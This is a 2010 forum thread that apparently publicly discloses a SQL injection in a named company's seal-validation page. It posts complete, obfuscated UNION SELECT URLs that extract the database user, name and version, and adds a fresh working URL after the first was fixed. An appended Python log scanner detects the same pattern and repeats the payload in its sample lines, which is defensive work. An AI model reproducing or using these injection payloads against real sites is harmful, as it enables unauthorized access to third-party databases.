Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Truste(dot)com SQli "The Leader in Advancing Online Confidence"
Posted by: VMw4r3
Date: July 19, 2010 02:23PM

Quote from site:
"The Leader in Advancing Online Confidence

Leading brands rely on TRUSTe privacy services to increase the confidence of their site visitors and realize improved leads, conversions and sign-ups."

http://www.truste.com/privacy_seals_and_services/index.html

hxxp://clicktoverify.truste.com/pvr.php?page=validate&url=www.facebook.com&sealid=102/*VMw4r3*/aNd/**/99/**/LiKe/**/98/**/UnIOn/**/SeLeCt/**/1,2,concat_ws(0x3a,user(),database(),@@version),4,5,6,7,8,9,10,11--

Image:
http://img843.imageshack.us/img843/3493/validationpageforonline.png



Edited 2 time(s). Last edit at 07/19/2010 07:05PM by VMw4r3.

Re: Truste(dot)com SQli "The Leader in Advancing Online Confidence"
Posted by: m1cr0n
Date: July 23, 2010 09:04AM

;)
Very good!
"The Leader in Advancing Online Confidence"

Makes me smile.

Re: Truste(dot)com SQli "The Leader in Advancing Online Confidence"
Posted by: VMw4r3
Date: July 23, 2010 12:22PM

lol Click With Confidence



/*update*/

The Facebook URL above is not vulnerable any more, but the site is still vulnerable.

hxxp://clicktoverify.truste.com/pvr.php?page=validate&url=www.free-tax-return.com&sealid=101/*VMw4r3*/aNd/**/99/**/LiKe/**/98/**/UnIOn/**/SeLeCt/**/1,2,concat_ws(0x3a,user(),database(),@@version),4,5,6,7,8,9,10,11--



Edited 2 time(s). Last edit at 08/23/2010 02:43PM by VMw4r3.
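
A defender-side check for the request pattern posted in this thread, as an added example that is not part of the original posts: it undoes URL encoding, `/**/` comments used in place of spaces and mixed-case keywords in the `sealid` parameter, then flags non-numeric or SQL-bearing values in access-log lines. The log format, function names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

COMMENT = re.compile(r"/\*.*?\*/", re.S)   # MySQL inline comment, used instead of spaces
KEYWORDS = re.compile(
    r"union\s+(?:all\s+)?select|concat_ws\s*\(|@@version|\b(?:user|database)\s*\(")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decode(value):
    """Percent-decode repeatedly (bounded) so double-encoded input is also seen."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_sealid(raw):
    """Return the reasons a sealid value is suspicious (empty list if clean)."""
    decoded = decode(raw)
    # Comments become spaces and case is folded, so UnIOn/**/SeLeCt reads "union select".
    flat = re.sub(r"\s+", " ", COMMENT.sub(" ", decoded)).lower()
    reasons = []
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        reasons.append("non-numeric")      # a seal id should only ever be an integer
    if COMMENT.search(decoded):
        reasons.append("inline-comment")
    if KEYWORDS.search(flat):
        reasons.append("sql-keyword")
    return reasons

def scan(lines):
    """Return (line_number, reasons) for log lines with a suspicious sealid."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        for raw in parse_qs(urlsplit(m.group(1)).query).get("sealid", []):
            reasons = inspect_sealid(raw)
            if reasons:
                hits.append((n, reasons))
    return hits

# Constructed access-log lines (not real traffic); addresses and hosts are placeholders.
SAMPLE = [
    '203.0.113.5 - - [19/Jul/2010:14:20:00 +0000] "GET /pvr.php?page=validate&url=www.example.test&sealid=102 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [19/Jul/2010:14:23:00 +0000] "GET /pvr.php?page=validate&url=www.example.test&sealid=102/*x*/aNd/**/99/**/LiKe/**/98/**/UnIOn/**/SeLeCt/**/1,2,concat_ws(0x3a,user(),database(),@@version),4-- HTTP/1.1" 200 5300',
    '203.0.113.9 - - [19/Jul/2010:14:24:00 +0000] "GET /pvr.php?page=validate&url=www.example.test&sealid=101%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsElEcT%2F%2A%2A%2F1 HTTP/1.1" 200 5300',
    '203.0.113.7 - - [19/Jul/2010:14:25:00 +0000] "GET /pvr.php?page=validate&url=www.example.test&sealid=abc HTTP/1.1" 200 900',
]
```

The `non-numeric` reason alone is enough to reject the request at the application; the other two reasons are there to help triage log hits.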